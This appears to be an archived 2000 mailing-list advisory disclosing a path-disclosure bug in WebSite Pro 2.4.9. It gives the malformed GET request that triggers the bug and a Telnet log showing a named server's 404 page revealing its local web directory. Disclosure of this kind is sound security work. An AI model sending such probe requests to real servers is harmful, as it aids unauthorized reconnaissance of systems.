I got a tip from Noah Rathaus about WebSite Pro latest version (2.4.9).
He mentioned a server where WebSite Pro 2.4.9 is run.
I discovered that the latest version is also vulnerable to the bug of
revealing web directories.
In the new version a change must be made to retrieve the directory name.

When you connect to a server send the command line:

GET /HTTP1.0 \

You now have to add a space before the last backspace of the command line.
That makes the server respond with a "404" error and prints the
directory name.

Here is the part from the logfile of Windows Telnet Client:

website.oreilly.com:
----------------------------------------------------start---------------------------------------------------

GET /HTTP1.0 \ 

HTTP/1.0 404 Not Found
Date: Thu, 13 Jan 2000 20:47:12 GMT
Server: WebSitePro/2.4.9
Accept-ranges: bytes
Content-type: text/html
Content-length: 216

<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
<BODY bgcolor="White"><H2>404 Not Found</H2>
The requested URL was not found on this server:<P><CODE>/HTTP1.0<P>(c
:\1Web\docs\website\HTTP1.0)</CODE><P>
</BODY></HTML>
--------------------------------------------------end------------------------------------------------------

Here it shows us the directory "c:\1Web\docs\website\".

Status: Vendor contacted and informed about the bug.
Expecting statement about fix.
-------------------------------
Lark Lizerman
Contact: Lark82at_private or webmasterat_private
-------------------------------
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:28:05 PDT